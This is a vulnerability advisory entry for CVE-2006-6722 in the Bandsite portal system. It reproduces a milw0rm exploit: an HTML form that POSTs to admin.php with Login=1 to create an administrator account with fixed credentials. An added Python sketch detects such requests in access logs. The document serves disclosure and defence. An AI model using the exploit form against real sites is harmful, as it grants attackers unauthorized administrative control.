Bandwebsite 'admin.php' Unauthorized Administrator Account Creation Vulnerability

Vulnerability ID: 1111782    Vulnerability type: Design error
Published: 2006-12-16    Updated: 2007-01-02
CVE ID: CVE-2006-6722    CNNVD-ID: CNNVD-200612-505
Platform: PHP    CVSS score: 7.5
|Source
https://www.exploit-db.com/exploits/2938
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-505
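|Vulnerability details
Bandwebsite (Bandsite portal system) 1.5 allows remote attackers to create administrator accounts via a direct request to admin.php with the Login parameter set to 1.
|Exploit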
<!--
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php 
- Author  : H0tTurk-

WebSiteVersion:1.x 
 - Problem : Admin Added Access.

Bandsite is an online portal system designed for Bands. Features: themes support, news posting, audio sections, guestbook, tour guide, an admin section to manage overall data and configurations, and more.
-->

<TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
  <TBODY>
    <TR><TD bgcolor=#ffffff>
      <form action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins method=post>
        Name:<br>
        <input type=text name='name' value='hotturk' size="20"><br>
        Pass:<br>
        <input type=text name='pass' value='hotturk' size="20"><br>
        <input type=submit name='submit' value='send'><br>
      </form>
    </TD></TR>
  </TBODY>
</TABLE>

<!--
Admin Added :)
http://[target]/bandwebsite/login.php
and login as admin 
name :hotturk
pass : hotturk

--------------------------------------------------------
Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,KurtEfendy,MadConfig,R4zor,Arabian-FighterZ,And Ayyildiz ViP Soldiers 
                                       "BUNDAN OTESİ YA İSTİKLAL YA OLUM"
-->

# milw0rm.com [2006-12-16]
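
A detection sketch for the request pattern described above, as an added example that is not part of the original advisory or exploit: it scans web access-log lines for requests to admin.php carrying Login=1. The Apache common/combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Common/combined log format: src ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify(method, target, status):
    """Return 'high', 'review' or None for one logged request."""
    parts = urlsplit(target)
    # Lower-casing the path and parameter names is deliberately over-inclusive.
    if not unquote(parts.path).lower().endswith("/admin.php"):
        return None
    # parse_qsl percent-decodes values and skips the empty pair in "?&Login=1".
    params = {}
    for key, value in parse_qsl(parts.query):
        params.setdefault(key.lower(), []).append(value)
    if "1" not in params.get("login", []):
        return None
    # The account-creation request on this page is a POST to section=admins.
    if method == "POST" and "admins" in params.get("section", []) and status < 400:
        return "high"
    return "review"

def scan(lines):
    """Return (severity, source, timestamp, target) for each matching line."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skipped rather than guessed at
        severity = classify(m["method"], m["target"], int(m["status"]))
        if severity:
            hits.append((severity, m["src"], m["ts"], m["target"]))
    return hits

# Constructed sample log lines (documentation address ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [16/Dec/2006:10:01:02 +0000] "POST /bandwebsite/admin.php?&Login=1&section=admins HTTP/1.1" 200 512',
    '198.51.100.4 - - [16/Dec/2006:10:02:11 +0000] "GET /bandwebsite/admin.php?Login=%31 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [16/Dec/2006:10:03:40 +0000] "GET /bandwebsite/login.php HTTP/1.1" 200 900',
    '192.0.2.10 - - [16/Dec/2006:10:03:55 +0000] "GET /bandwebsite/admin.php?Login=0 HTTP/1.1" 302 0',
    '203.0.113.7 - - [16/Dec/2006:10:05:00 +0000] "POST /bandwebsite/Admin.php?login=1&section=admins HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(*hit, sep="\t")
```

Hits marked "review" still need correlating with the session's earlier login.php request and with the list of administrator accounts before they are treated as confirmed.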
|References

Source: XF
Name: bandsite-admin-security-bypass(30921)
Link: http://xforce.iss.net/xforce/xfdb/30921
Source: MISC
Link: http://www.securityfocus.com/data/vulnerabilities/exploits/21625.html
Source: BID
Name: 21625
Link: http://www.securityfocus.com/bid/21625
Source: MILW0RM
Name: 2938
Link: http://www.milw0rm.com/exploits/2938
Source: MILW0RM
Name: 2938
Link: http://milw0rm.com/exploits/2938